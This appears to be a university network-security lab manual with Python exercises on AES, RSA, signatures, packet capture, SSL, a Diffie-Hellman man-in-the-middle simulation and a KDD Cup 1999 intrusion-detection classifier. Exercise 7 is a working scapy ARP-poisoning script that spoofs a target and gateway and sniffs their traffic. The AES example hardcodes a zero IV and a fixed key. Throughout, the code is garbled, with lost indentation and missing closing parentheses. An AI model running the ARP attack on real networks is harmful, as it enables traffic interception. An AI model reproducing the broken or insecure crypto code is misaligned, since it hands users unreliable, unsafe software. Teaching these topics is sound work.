PRACTICAL EXERCISES:
1. Implement symmetric key algorithms
2. Implement asymmetric key algorithms and key exchange algorithms
3. Implement digital signature schemes
4.Installation of Wire shark, tcpdump and observe data transferred in client-server
communication using UDP/TCP and identify the UDP/TCP datagram.
5. Check message integrity and confidentiality using SSL
6. Experiment Eavesdropping, Dictionary attacks, MITM attacks
7. Experiment with Sniff Traffic using ARP Poisoning
8. Demonstrate intrusion detection system using any tool.
9. Explore network monitoring tools
10. Study to configure Firewall, VPN
1. Implement symmetric key algorithms in python program
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms,
modes from cryptography.hazmat.primitives import padding from base64
import b64encode, b64decode
def encrypt(key, plaintext):
# Generate a random IV (Initialization Vector)
iv = b'\x00' * 16 # You should use a proper IV for real-world applications
# Pad the plaintext before encryption
padder = padding.PKCS7(128).padder()
plaintext = padder.update(plaintext) + padder.finalize()
# Create an AES cipher object
cipher = Cipher(algorithms.AES(key), modes.CFB(iv),
backend=default_backend())
# Encrypt the plaintext
encryptor = cipher.encryptor()
ciphertext = encryptor.update(plaintext) + encryptor.finalize()
# Return the IV and ciphertext as base64-encoded strings
return b64encode(iv).decode('utf-8'), b64encode(ciphertext).decode('utf-8')
def decrypt(key, iv, ciphertext):
# Decode the IV and ciphertext from base64
iv = b64decode(iv)
ciphertext = b64decode(ciphertext)
# Create an AES cipher object
cipher = Cipher(algorithms.AES(key), modes.CFB(iv),
backend=default_backend())
# Decrypt the ciphertext
decryptor = cipher.decryptor()
decrypted_text = decryptor.update(ciphertext) + decryptor.finalize()
# Unpad the decrypted plaintext
unpadder = padding.PKCS7(128).unpadder()
plaintext = unpadder.update(decrypted_text) + unpadder.finalize()
# Return the decrypted plaintext as a string
return plaintext.decode('utf-8')
# Example usage:
if __name__ == "__main__":
# Generate a random 128-bit key (16 bytes)
key = b'\x01' * 16 # You should use a secure key generation method
# The text to be encrypted
plaintext = "Hello, symmetric encryption!"
# Encrypt the plaintext
iv, ciphertext = encrypt(key, plaintext.encode('utf-8'))
print("IV:", iv)
print("Ciphertext:", ciphertext)
# Decrypt the ciphertext
decrypted_text = decrypt(key, iv, ciphertext)
print("Decrypted Text:", decrypted_text)
Output:
Ciphertext: /svDlhoB4PgoDvpUAmiEY0ro8YwVfT8LUBh24Ay/ZtQ=
Decrypted Text: Hello, symmetric encryption!
2. Implement digital signature scheme in python from
cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization, hashes from
cryptography.hazmat.primitives.asymmetric import rsa, padding
def generate_key_pair():
# Generate an RSA key pair
private_key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
backend=default_backend()
# Extract the public key
public_key = private_key.public_key()
# Serialize the keys to PEM format
private_pem = private_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.NoEncryption()
public_pem = public_key.public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
return private_pem, public_pem
def sign(private_key_pem, message):
# Load the private key from PEM format
private_key= serialization.load_pem_private_key(private_key_pem,
password=None, backend=default_backend())
# Sign the message
signature = private_key.sign(
message,
padding.PSS(
mgf=padding.MGF1(hashes.SHA256()),
salt_length=padding.PSS.MAX_LENGTH
),
hashes.SHA256()
# Return the signature as a base64-encoded string
return signature
def verify(public_key_pem, message, signature):
# Load the public key from PEM format
public_key = serialization.load_pem_public_key(public_key_pem,
backend=default_backend())
# Verify the signature
try:
public_key.verify(
signature,
message,
padding.PSS(
mgf=padding.MGF1(hashes.SHA256()),
salt_length=padding.PSS.MAX_LENGTH
),
hashes.SHA256()
return True
except Exception as e:
print("Verification failed:", e)
return False
# Example usage:
if __name__ == "__main__":
# Generate an RSA key pair
private_key_pem, public_key_pem = generate_key_pair()
# The text to be signed
message = b"Hello, digital signature!"
# Sign the message
signature = sign(private_key_pem, message)
print("Signature:", signature)
# Verify the signature
verification_result = verify(public_key_pem, message, signature)
if verification_result:
print("Signature is valid.")
else:
print("Signature is not valid.")
Output:
Signature is valid
3. Implement asymmetric key algorithms in python program
>>> from cryptography.hazmat.backends import default_backend
>>> from cryptography.hazmat.primitives.asymmetric import rsa
>>> private_key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
backend=default_backend()
)
>>> public_key = private_key.public_key()
# Storing the keys
>>> from cryptography.hazmat.primitives import serialization
>>> pem = private_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption()
>>> with open('private_key.pem', 'wb') as f:
f.write(pem)
>>>
>>> pem = public_key.public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
>>> with open('public_key.pem', 'wb') as f:
f.write(pem)
# Reading the keys back in (for demonstration purposes)
>>> from cryptography.hazmat.backends import default_backend
>>> from cryptography.hazmat.primitives import serialization
>>> with open("private_key.pem", "rb") as key_file:
private_key = serialization.load_pem_private_key(
key_file.read(),
password=None,
backend=default_backend()
>>> with open("public_key.pem", "rb") as key_file:
public_key = serialization.load_pem_public_key(
key_file.read(),
backend=default_backend()
# Encrypting and decrypting
>>> from cryptography.hazmat.primitives import hashes
>>> from cryptography.hazmat.primitives.asymmetric import padding
>>>
>>> message = b'encrypt me!'
>>> encrypted = public_key.encrypt(
message,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA256()),
algorithm=hashes.SHA256(),
label=None
)
)
>>> original_message = private_key.decrypt(
encrypted,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA256()),
algorithm=hashes.SHA256(),
label=None
# Checking the results
>>> original_message
b'encrypt me!'
>>> message == original_message
True
Output:
True
4.Installation of Wire shark, tcpdump and observe data transferred in client-
server communication using UDP/TCP and identify the UDP/TCP datagram.
To install Wireshark and tcpdump, you can follow the steps below:
Installing tcpdump
1. For most Linux distributions, tcpdump is available as a standard package.
You can install it using the package manager of your distribution. For
example, on Red Hat and similar distributions, you can use the command:
sudo dnf install tcpdump
On Debian and similar distributions, you can use:
sudo apt install tcpdump
2. If tcpdump is not available as a standard package, you can download it from
the official website https://www.tcpdump.org/ and follow the installation
instructions provided.
Installing Wireshark
1. Wireshark is available for most Linux distributions as well. You can install it
using the package manager of your distribution. For example, on Ubuntu, you
can use the command:
sudo apt install wireshark
2. For other distributions, you can refer to their specific package management
commands to install Wireshark.
Capturing and Analyzing Traffic
Once you have installed tcpdump and Wireshark, you can capture packets using
tcpdump and then analyze the captured data in Wireshark. Here are the basic steps:
1. Capture packets using tcpdump. For example, to capture packets on a specific
interface and save them to a file, you can use the following command:
sudo tcpdump -i <interface> -w <file.pcap>
2. Transfer the captured file to your local machine where Wireshark is installed.
You can use SCP for this purpose.
3. Open the captured file in Wireshark to analyze the traffic. You can identify
UDP and TCP datagrams in the captured data using Wireshark's filtering and
analysis capabilities.
By following these steps, you can install tcpdump and Wireshark, capture network
traffic, and analyze the captured data to identify UDP and TCP datagrams.
5. Check message integrity and confidentiality using SSL
import ssl
import socket
# create a socket object
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# wrap the socket with SSL
ssl_sock = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1_2,
ciphers="AES256-SHA")
# connect to the server
ssl_sock.connect(('localhost', 443))
# send a message to the server
message = "Hello, server!"
ssl_sock.write(message.encode())
# receive a response from the server
response = ssl_sock.read()
print(response.decode())
# close the SSL connection
ssl_sock.close()
6. Experiment Eavesdropping, Dictionary attacks, MITM attacks
Man in the Middle (MITM) against Diffie-Hellman:
A malicious Malory, that has a MitM (man in the middle) position, can manipulate
the communications between Alice and Bob, and break the security of the key
exchange.
Step by Step explanation of this process:
Step 1: Selected public numbers p and g, p is a prime number, called the “modulus”
and g is called the base.
Step 2: Selecting private numbers.
let Alice pick a private random number a and let Bob pick a private random number
b, Malory picks 2 random numbers c and d.
Step 3: Intercepting public values,
Malory intercepts Alice’s public value (ga(mod p)), block it from reaching Bob, and
instead sends Bob her own public value (gc(modp)) and Malory intercepts Bob’s
public value (gb(mod p)), block it from reaching Alice, and instead sends Alice her
own public value (gd (modp))
Step 4: Computing secret key
Alice will compute a key S1=gda(mod p), and Bob will compute a different key,
S2=gcb(mod p)
Step 5: If Alice uses S1 as a key to encrypt a later message to Bob, Malory can
decrypt it, re-encrypt it using S2, and send it to Bob. Bob and Alice won’t notice
any problem and may assume their communication is encrypted, but in reality,
Malory can decrypt, read, modify, and then re-encrypt all their conversations.
Below is the implementation:
Python3
import random
# public keys are taken
# p is a prime number
# g is a primitive root of p
p = int(input('Enter a prime number : '))
g = int(input('Enter a number : '))
class A:
def __init__(self):
# Generating a random private number selected by alice
self.n = random.randint(1, p)
def publish(self):
# generating public values
return (g**self.n)%p
def compute_secret(self, gb):
# computing secret key
return (gb**self.n)%p
class B:
def __init__(self):
# Generating a random private number selected for alice
self.a = random.randint(1, p)
# Generating a random private number selected for bob
self.b = random.randint(1, p)
self.arr = [self.a,self.b]
def publish(self, i):
# generating public values
return (g**self.arr[i])%p
def compute_secret(self, ga, i):
# computing secret key
return (ga**self.arr[i])%p
alice = A()
bob = A()
eve = B()
# Printing out the private selected number by Alice and Bob
print(f'Alice selected (a) : {alice.n}')
print(f'Bob selected (b) : {bob.n}')
print(f'Eve selected private number for Alice (c) : {eve.a}')
print(f'Eve selected private number for Bob (d) : {eve.b}')
# Generating public values
ga = alice.publish()
gb = bob.publish()
gea = eve.publish(0)
geb = eve.publish(1)
print(f'Alice published (ga): {ga}')
print(f'Bob published (gb): {gb}')
print(f'Eve published value for Alice (gc): {gea}')
print(f'Eve published value for Bob (gd): {geb}')
# Computing the secret key
sa = alice.compute_secret(gea)
sea = eve.compute_secret(ga,0)
sb = bob.compute_secret(geb)
seb = eve.compute_secret(gb,1)
print(f'Alice computed (S1) : {sa}')
print(f'Eve computed key for Alice (S1) : {sea}')
print(f'Bob computed (S2) : {sb}')
print(f'Eve computed key for Bob (S2) : {seb}')
Output:
Enter a prime number (p) : 227
Enter a number (g) : 14
Alice selected (a) : 227
Bob selected (b) : 170
Eve selected private number for Alice (c) : 65
Eve selected private number for Bob (d) : 175
Alice published (ga): 14
Bob published (gb): 101
Eve published value for Alice (gc): 41
Eve published value for Bob (gd): 32
Alice computed (S1) : 41
Eve computed key for Alice (S1) : 41
Bob computed (S2) : 167
Eve computed key for Bob (S2) : 167
7. Experiment with Sniff Traffic using ARP Poisoning
python
from scapy.all import *
# define the target IP and MAC addresses
target_ip = "192.168.1.100"
target_mac = "00:11:22:33:44:55"
# define the gateway IP and MAC addresses
gateway_ip = "192.168.1.1"
gateway_mac = "11:22:33:44:55:66"
# create ARP packets to poison the target and gateway
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
# send the ARP packets to poison the target and gateway
send(poison_target)
send(poison_gateway)
# sniff network traffic and print packets
def sniff_packets(packet):
if packet.haslayer(IP):
print(packet[IP].src, "->", packet[IP].dst)
sniff(prn=sniff_packets)
8. Demonstrate intrusion detection system using any tool.
Intrusion Detection System is a software application to detect network intrusion
using various machine learning algorithms.IDS monitors a network or system for
malicious activity and protects a computer network from unauthorized access from
users, including perhaps insider. The intrusion detector learning task is to build a
predictive model (i.e. a classifier) capable of distinguishing between ‘bad
connections’ (intrusion/attacks) and a ‘good (normal) connections’.
Attacks fall into four main categories:
#DOS: denial-of-service, e.g. syn flood;
#R2L: unauthorized access from a remote machine, e.g. guessing password;
#U2R: unauthorized access to local superuser (root) privileges, e.g., various
“buffer overflow” attacks;
#probing: surveillance and another probing, e.g., port scanning.
Dataset Used : KDD Cup 1999 dataset
Dataset Description: Data files:
kddcup.names : A list of features.
kddcup.data.gz : The full data set
kddcup.data_10_percent.gz : A 10% subset.
kddcup.newtestdata_10_percent_unlabeled.gz
kddcup.testdata.unlabeled.gz
kddcup.testdata.unlabeled_10_percent.gz
corrected.gz : Test data with corrected labels.
training_attack_types : A list of intrusion types.
typo-correction.txt : A brief note on a typo in the data set that has been
corrected
Features:
feature name description type
duration length (number of seconds) of the connection continuous
protocol_type type of the protocol, e.g. tcp, udp, etc. discrete
network service on the destination, e.g., http,
service discrete
telnet, etc.
src_bytes number of data bytes from source to destination continuous
dst_bytes number of data bytes from destination to source continuous
flag normal or error status of the connection discrete
1 if connection is from/to the same host/port; 0
land discrete
otherwise
wrong_fragment number of “wrong” fragments continuous
urgent number of urgent packets continuous
Table 1: Basic features of individual TCP connections.
feature name description type
hot number of “hot” indicators continuous
num_failed_logins number of failed login attempts continuous
logged_in 1 if successfully logged in; 0 otherwise discrete
num_compromised number of “compromised” conditions continuous
root_shell 1 if root shell is obtained; 0 otherwise discrete
1 if “su root” command attempted; 0
su_attempted discrete
otherwise
num_root number of “root” accesses continuous
num_file_creations number of file creation operations continuous
num_shells number of shell prompts continuous
num_access_files number of operations on access control files continuous
number of outbound commands in an ftp
num_outbound_cmds continuous
session
1 if the login belongs to the “hot” list; 0
is_hot_login discrete
otherwise
is_guest_login 1 if the login is a “guest”login; 0 otherwise discrete
Table 2: Content features within a connection suggested by domain knowledge.
feature name description type
number of connections to the same host as the
count continuous
current connection in the past two seconds
Note: The following features refer to these same-
host connections.
serror_rate % of connections that have “SYN” errors continuous
rerror_rate % of connections that have “REJ” errors continuous
same_srv_rate % of connections to the same service continuous
diff_srv_rate % of connections to different services continuous
number of connections to the same service as the
srv_count continuous
current connection in the past two seconds
Note: The following features refer to these same-
service connections.
srv_serror_rate % of connections that have “SYN” errors continuous
srv_rerror_rate % of connections that have “REJ” errors continuous
srv_diff_host_rate % of connections to different hosts continuous
Table 3: Traffic features computed using a two-second time window.
Various Algorithms Applied: Gaussian Naive Bayes, Decision Tree, Random
Forest, Support Vector Machine, Logistic Regression.
Approach Used: I have applied various classification algorithms that are
mentioned above on the KDD dataset and compare there results to build a
predictive model.
Step 1 – Data Preprocessing:
Code: Importing libraries and reading features list from ‘kddcup.names’ file.
import os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import time
# reading features list
with open("..\\kddcup.names", 'r') as f:
print(f.read())
Code: Appending columns to the dataset and adding a new column name
‘target’ to the dataset.
cols ="""duration,
protocol_type,
service,
flag,
src_bytes,
dst_bytes,
land,
wrong_fragment,
urgent,
hot,
num_failed_logins,
logged_in,
num_compromised,
root_shell,
su_attempted,
num_root,
num_file_creations,
num_shells,
num_access_files,
num_outbound_cmds,
is_host_login,
is_guest_login,
count,
srv_count,
serror_rate,
srv_serror_rate,
rerror_rate,
srv_rerror_rate,
same_srv_rate,
diff_srv_rate,
srv_diff_host_rate,
dst_host_count,
dst_host_srv_count,
dst_host_same_srv_rate,
dst_host_diff_srv_rate,
dst_host_same_src_port_rate,
dst_host_srv_diff_host_rate,
dst_host_serror_rate,
dst_host_srv_serror_rate,
dst_host_rerror_rate,
dst_host_srv_rerror_rate"""
columns =[]
for c in cols.split(', '):
if(c.strip()):
columns.append(c.strip())
columns.append('target')
print(len(columns))
Output:
42
Code: Reading the ‘attack_types’ file.
with open("..\\training_attack_types", 'r') as f:
print(f.read())
Output:
back dos
buffer_overflow u2r
ftp_write r2l
guess_passwd r2l
imap r2l
ipsweep probe
land dos
loadmodule u2r
multihop r2l
neptune dos
nmap probe
perl u2r
phf r2l
pod dos
portsweep probe
rootkit u2r
satan probe
smurf dos
spy r2l
teardrop dos
warezclient r2l
warezmaster r2l
Code: Creating a dictionary of attack_types
attacks_types = {
'normal': 'normal',
'back': 'dos',
'buffer_overflow': 'u2r',
'ftp_write': 'r2l',
'guess_passwd': 'r2l',
'imap': 'r2l',
'ipsweep': 'probe',
'land': 'dos',
'loadmodule': 'u2r',
'multihop': 'r2l',
'neptune': 'dos',
'nmap': 'probe',
'perl': 'u2r',
'phf': 'r2l',
'pod': 'dos',
'portsweep': 'probe',
'rootkit': 'u2r',
'satan': 'probe',
'smurf': 'dos',
'spy': 'r2l',
'teardrop': 'dos',
'warezclient': 'r2l',
'warezmaster': 'r2l',
Code: Reading the dataset(‘kddcup.data_10_percent.gz’) and adding Attack Type
feature in the training dataset where attack type feature has 5 distinct values i.e. dos,
normal, probe, r2l, u2r.
path = "..\\kddcup.data_10_percent.gz"
df = pd.read_csv(path, names = columns)
# Adding Attack Type column
df['Attack Type'] = df.target.apply(lambda r:attacks_types[r[:-1]])
df.head()
Code: Shape of dataframe and getting data type of each feature
df.shape
Output:
(494021, 43)
Code: Finding missing values of all features.
df.isnull().sum()
Output:
duration 0
protocol_type 0
service 0
flag 0
src_bytes 0
dst_bytes 0
land 0
wrong_fragment 0
urgent 0
hot 0
num_failed_logins 0
logged_in 0
num_compromised 0
root_shell 0
su_attempted 0
num_root 0
num_file_creations 0
num_shells 0
num_access_files 0
num_outbound_cmds 0
is_host_login 0
is_guest_login 0
count 0
srv_count 0
serror_rate 0
srv_serror_rate 0
rerror_rate 0
srv_rerror_rate 0
same_srv_rate 0
diff_srv_rate 0
srv_diff_host_rate 0
dst_host_count 0
dst_host_srv_count 0
dst_host_same_srv_rate 0
dst_host_diff_srv_rate 0
dst_host_same_src_port_rate 0
dst_host_srv_diff_host_rate 0
dst_host_serror_rate 0
dst_host_srv_serror_rate 0
dst_host_rerror_rate 0
dst_host_srv_rerror_rate 0
target 0
Attack Type 0
dtype: int64
No missing value found, so we can further proceed to our next step.
Code: Finding Categorical Features
# Finding categorical features
num_cols = df._get_numeric_data().columns
cate_cols = list(set(df.columns)-set(num_cols))
cate_cols.remove('target')
cate_cols.remove('Attack Type')
cate_cols
Output:
['service', 'flag', 'protocol_type']
Visualizing Categorical Features using bar graph
Protocol type: We notice that ICMP is the most present in the used data, then TCP
and almost 20000 packets of UDP type
logged_in (1 if successfully logged in; 0 otherwise): We notice that just 70000
packets are successfully logged in.
Target Feature Distribution:
Attack Type(The attack types grouped by attack, it’s what we will predict)
Code: Data Correlation – Find the highly correlated variables using heatmap
and ignore them for analysis.
df = df.dropna('columns')# drop columns with NaN
df = df[[col for col in df if df[col].nunique() > 1]]# keep columns where there are more
than 1 unique values
corr = df.corr()
plt.figure(figsize =(15, 12))
sns.heatmap(corr)
plt.show()
Output:
Code:
# This variable is highly correlated with num_compromised and should be ignored for
analysis.
#(Correlation = 0.9938277978738366)
df.drop('num_root', axis = 1, inplace = True)
# This variable is highly correlated with serror_rate and should be ignored for analysis.
#(Correlation = 0.9983615072725952)
df.drop('srv_serror_rate', axis = 1, inplace = True)
# This variable is highly correlated with rerror_rate and should be ignored for analysis.
#(Correlation = 0.9947309539817937)
df.drop('srv_rerror_rate', axis = 1, inplace = True)
# This variable is highly correlated with srv_serror_rate and should be ignored for
analysis.
#(Correlation = 0.9993041091850098)
df.drop('dst_host_srv_serror_rate', axis = 1, inplace = True)
# This variable is highly correlated with rerror_rate and should be ignored for analysis.
#(Correlation = 0.9869947924956001)
df.drop('dst_host_serror_rate', axis = 1, inplace = True)
# This variable is highly correlated with srv_rerror_rate and should be ignored for
analysis.
#(Correlation = 0.9821663427308375)
df.drop('dst_host_rerror_rate', axis = 1, inplace = True)
# This variable is highly correlated with rerror_rate and should be ignored for analysis.
#(Correlation = 0.9851995540751249)
df.drop('dst_host_srv_rerror_rate', axis = 1, inplace = True)
# This variable is highly correlated with srv_rerror_rate and should be ignored for
analysis.
#(Correlation = 0.9865705438845669)
df.drop('dst_host_same_srv_rate', axis = 1, inplace = True)
Output:
Code: Feature Mapping – Apply feature mapping on features such as :
‘protocol_type’ & ‘flag’.
# protocol_type feature mapping
pmap = {'icmp':0, 'tcp':1, 'udp':2}
df['protocol_type'] = df['protocol_type'].map(pmap)
Code:
# flag feature mapping
fmap = {'SF':0, 'S0':1, 'REJ':2, 'RSTR':3, 'RSTO':4, 'SH':5, 'S1':6, 'S2':7, 'RSTOS0':8,
'S3':9, 'OTH':10}
df['flag'] = df['flag'].map(fmap)
Output:
Code: Remove irrelevant features such as ‘service’ before modelling
df.drop('service', axis = 1, inplace = True)
Step 2 – Modelling
Code: Importing libraries and splitting the dataset
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
Code:
# Splitting the dataset
df = df.drop(['target', ], axis = 1)
print(df.shape)
# Target variable and train set
y = df[['Attack Type']]
X = df.drop(['Attack Type', ], axis = 1)
sc = MinMaxScaler()
X = sc.fit_transform(X)
# Split test and train data
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.33, random_state =
42)
print(X_train.shape, X_test.shape)
print(y_train.shape, y_test.shape)
Output:
(494021, 31)
(330994, 30) (163027, 30)
(330994, 1) (163027, 1)
Apply various machine learning classification algorithms such as Support Vector
Machines, Random Forest, Naive Bayes, Decision Tree, Logistic Regression to
create different models.
Code: Python implementation of Gaussian Naive Bayes
# Gaussian Naive Bayes
from sklearn.naive_bayes import GaussianNB
from sklearn.metrics import accuracy_score
clfg = GaussianNB()
start_time = time.time()
clfg.fit(X_train, y_train.values.ravel())
end_time = time.time()
print("Training time: ", end_time-start_time)
Output:
Training time: 1.1145250797271729
Code:
start_time = time.time()
y_test_pred = clfg.predict(X_train)
end_time = time.time()
print("Testing time: ", end_time-start_time)
Output:
Testing time: 1.543299674987793
Code:
print("Train score is:", clfg.score(X_train, y_train))
print("Test score is:", clfg.score(X_test, y_test))
Output:
Train score is: 0.8795114110829804
Test score is: 0.8790384414851528
Code: Python implementation of Decision Tree
# Decision Tree
from sklearn.tree import DecisionTreeClassifier
clfd = DecisionTreeClassifier(criterion ="entropy", max_depth = 4)
start_time = time.time()
clfd.fit(X_train, y_train.values.ravel())
end_time = time.time()
print("Training time: ", end_time-start_time)
Output:
Training time: 2.4408750534057617
start_time = time.time()
y_test_pred = clfd.predict(X_train)
end_time = time.time()
print("Testing time: ", end_time-start_time)
Output:
Testing time: 0.1487727165222168
print("Train score is:", clfd.score(X_train, y_train))
print("Test score is:", clfd.score(X_test, y_test))
Output:
Train score is: 0.9905829108684749
Test score is: 0.9905230421954646
Code: Python code implementation of Random Forest
from sklearn.ensemble import RandomForestClassifier
clfr = RandomForestClassifier(n_estimators = 30)
start_time = time.time()
clfr.fit(X_train, y_train.values.ravel())
end_time = time.time()
print("Training time: ", end_time-start_time)
Output:
Training time: 17.084914684295654
start_time = time.time()
y_test_pred = clfr.predict(X_train)
end_time = time.time()
print("Testing time: ", end_time-start_time)
Output:
Testing time: 0.1487727165222168
print("Train score is:", clfr.score(X_train, y_train))
print("Test score is:", clfr.score(X_test, y_test))
Output:
Train score is: 0.99997583037759
Test score is: 0.9996933023364228
Code: Python implementation of Support Vector Classifier
from sklearn.svm import SVC
clfs = SVC(gamma = 'scale')
start_time = time.time()
clfs.fit(X_train, y_train.values.ravel())
end_time = time.time()
print("Training time: ", end_time-start_time)
Output:
Training time: 218.26840996742249
Code:
start_time = time.time()
y_test_pred = clfs.predict(X_train)
end_time = time.time()
print("Testing time: ", end_time-start_time)
Output:
Testing time: 126.5087513923645
Code:
print("Train score is:", clfs.score(X_train, y_train))
print("Test score is:", clfs.score(X_test, y_test))
Output:
Train score is: 0.9987552644458811
Test score is: 0.9987916112055059
Code: Python implementation of Logistic Regression
from sklearn.linear_model import LogisticRegression
clfl = LogisticRegression(max_iter = 1200000)
start_time = time.time()
clfl.fit(X_train, y_train.values.ravel())
end_time = time.time()
print("Training time: ", end_time-start_time)
Output:
Training time: 92.94222283363342
Code:
start_time = time.time()
y_test_pred = clfl.predict(X_train)
end_time = time.time()
print("Testing time: ", end_time-start_time)
Output:
Testing time: 0.09605908393859863
Code:
print("Train score is:", clfl.score(X_train, y_train))
print("Test score is:", clfl.score(X_test, y_test))
Output:
Train score is: 0.9935285835997028
Test score is: 0.9935286792985211
Code: Python implementation of Gradient Descent
from sklearn.ensemble import GradientBoostingClassifier
clfg = GradientBoostingClassifier(random_state = 0)
start_time = time.time()
clfg.fit(X_train, y_train.values.ravel())
end_time = time.time()
print("Training time: ", end_time-start_time)
Output:
Training time: 633.2290260791779
start_time = time.time()
y_test_pred = clfg.predict(X_train)
end_time = time.time()
print("Testing time: ", end_time-start_time)
Output:
Testing time: 2.9503915309906006
print("Train score is:", clfg.score(X_train, y_train))
print("Test score is:", clfg.score(X_test, y_test))
Output:
Train score is: 0.9979304760811374
Test score is: 0.9977181693829856
Code: Analyse the training and testing accuracy of each model.
names = ['NB', 'DT', 'RF', 'SVM', 'LR', 'GB']
values = [87.951, 99.058, 99.997, 99.875, 99.352, 99.793]
f = plt.figure(figsize =(15, 3), num = 10)
plt.subplot(131)
plt.bar(names, values)
Output:
Code:
names = ['NB', 'DT', 'RF', 'SVM', 'LR', 'GB']
values = [87.903, 99.052, 99.969, 99.879, 99.352, 99.771]
f = plt.figure(figsize =(15, 3), num = 10)
plt.subplot(131)
plt.bar(names, values)
Output:
Code: Analyse the training and testing time of each model.
names = ['NB', 'DT', 'RF', 'SVM', 'LR', 'GB']
values = [1.11452, 2.44087, 17.08491, 218.26840, 92.94222, 633.229]
f = plt.figure(figsize =(15, 3), num = 10)
plt.subplot(131)
plt.bar(names, values)
Output:
Code:
names = ['NB', 'DT', 'RF', 'SVM', 'LR', 'GB']
values = [1.54329, 0.14877, 0.199471, 126.50875, 0.09605, 2.95039]
f = plt.figure(figsize =(15, 3), num = 10)
plt.subplot(131)
plt.bar(names, values)
Output: